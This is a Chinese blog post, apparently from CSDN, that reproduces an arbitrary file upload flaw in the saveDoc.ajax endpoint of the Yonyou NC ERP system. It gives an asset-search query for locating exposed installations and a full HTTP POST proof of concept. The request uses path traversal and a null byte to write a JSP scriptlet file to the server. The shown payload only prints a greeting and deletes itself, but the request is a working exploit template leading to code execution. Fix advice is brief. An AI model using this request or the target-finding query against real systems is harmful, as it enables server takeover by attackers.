用友NC saveDoc.ajax 任意文件上传漏洞复现

最新推荐文章于 2024-07-29 01:38:46 发布
最新推荐文章于 2024-07-29 01:38:46 发布
阅读量899 收藏 1
点赞数 8
分类专栏: 漏洞复现 文章标签: web安全 安全 ajax
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/136510046
版权
文章介绍了用友NC这款企业级ERP软件中的文件上传漏洞,攻击者可利用该漏洞获取服务器权限。提供POC示例和安全修复建议,强调仅限于安全研究,严禁非法使用。
摘要由CSDN通过智能技术生成

产品介绍

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

漏洞描述

用友NC 系统 saveDoc.ajax 存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。

资产测绘

app=“用友-UFIDA-NC” && title==“产品登录界面”
在这里插入图片描述

漏洞复现

POC:

POST /uapws/saveDoc.ajax?ws=/../../4627716.jspx%00 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 288

content=<hi xmlns:hi="http://java.sun.com/JSP/Page">
      <hi:directive.page import="java.util.*,java.io.*,java.net.*"/>
   <hi:scriptlet>
            out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); 
   </hi:scriptlet>
</hi>

在这里插入图片描述
访问上传文件地址:ip/uapws/4627716.jspx
在这里插入图片描述

修复建议

1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

keepb1ue
关注
  • 8
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友nc-sacedoc文件上传漏洞
weixin_43567873的博客
03-27 235
用友nc-sacedoc文件上传漏洞
用友 NC saveDoc.ajax 任意文件上传漏洞
weixin_43567873的博客
03-10 130
用友 NC saveDoc.ajax 任意文件上传漏洞
漏洞复现用友 UFIDA saveDoc.ajax 任意文件上传漏洞
凝聚力安全团队
06-26 1280
用友 UFIDA saveDoc.ajax接口存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。
用友portal接口存在任意文件读取漏洞
waxcj的博客
01-22 547
用友portal接口存在任意文件读取漏洞
用友uapws系统某接口存在任意文件读取漏洞
weixin_43167326的博客
03-08 474
用友此系统是一款全面的企业管理软件,涵盖财务、人力资源、供应链等多个领域,助力企业实现信息化管理和业务优化。此系统某接口存在任意文件读取漏洞
用友UFIDA-NC-saveDoc任意文件上传漏洞
qq_36334672的博客
03-08 481
用友-UFIDA-NC saveDoc.ajax 存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,获取系统权限。
用友php漏洞,用友漏洞存在目录整理 | CN-SEC 中文网
weixin_34637293的博客
04-10 1274
/core/public/singleplandetail.jsp /epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V /service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_...
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
用友NC BeanShell远程代码执行
09-07
# 用友NC BeanShell远程代码执行 # CNVD-2021-30167 ## 漏洞描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.[servlet]...
用友NC操作流程.pdf
04-05
用友NC操作流程详解》 用友NC是一款先进的企业资源计划系统,广泛应用于大型企业的财务管理、供应链管理、生产制造等多个领域。其操作流程严谨且细致,涉及到多个关键环节,确保了系统的安全性和效率。以下将详细...
用友nc数据字典.xls
02-19
用友nc数据字典.xls
用友NC运维服务方案.ppt
03-22
用友NC运维服务方案.ppt
UAP开发中遇到的问题
四叶猫的博客
06-09 3598
1.Failed to set property: vbillstatus at bean…… vbillstatus参数类型错误,在主子表开发中,元数据中的“单据状态”的数据库映射字段必须为int类型,不能是varchar(虽然在VO中这个字段是String),否则会报这个错误。 2. ...
使用ajax调用webservice
黄俊东的专栏
06-01 5816
注意,使用ajax调用webservice时,尽量使用ie浏览器,如果使用chrome或者是firefox浏览器,很可能会出现以下异常 2013-6-1 11:10:02 com.sun.xml.internal.ws.transport.http.server.WSHttpHandler handleExchange 警告: Cannot handle HTTP method: OPTIONS
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 823
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础完整教学上(超详细)
weixin_60838266的博客
07-28 726
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“超文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
WEB安全】 PHP基础文件知识完整教学中(超详细)
最新发布
weixin_60838266的博客
07-29 607
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
用友nc6.5 文件上传
09-06
用友NC6.5中,文件上传通常是通过以下步骤完成的: 1. 登录用友NC6.5系统,进入相关业务模块或页面。 2. 找到需要上传文件的相关功能或模块按钮,通常会有一个上传文件的图标或链接。 3. 点击上传文件按钮或链接,系统将弹出一个文件选择对话框。 4. 在文件选择对话框中,浏览本地文件系统,找到需要上传的文件,并选择该文件。 5. 确定文件选择后,点击“上传”或“确定”按钮,系统开始将选定的文件上传到服务器。 6. 在文件上传过程中,系统可能会显示上传进度条或文件上传状态。 7. 上传完成后,系统会提示文件上传成功,并显示相关的文件信息,如文件名、大小等。 8. 根据实际需求,可能需要进一步操作或处理上传的文件,如保存文件到数据库、关联文件到相关业务记录等。 请注意,以上步骤只是一般的文件上传流程,在用友NC6.5系统中,具体的文件上传操作可能会因业务模块或页面的不同而有所差异。所以,在具体操作时,最好参考系统提供的相关文档或向系统管理员咨询以获取详细的操作指导。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值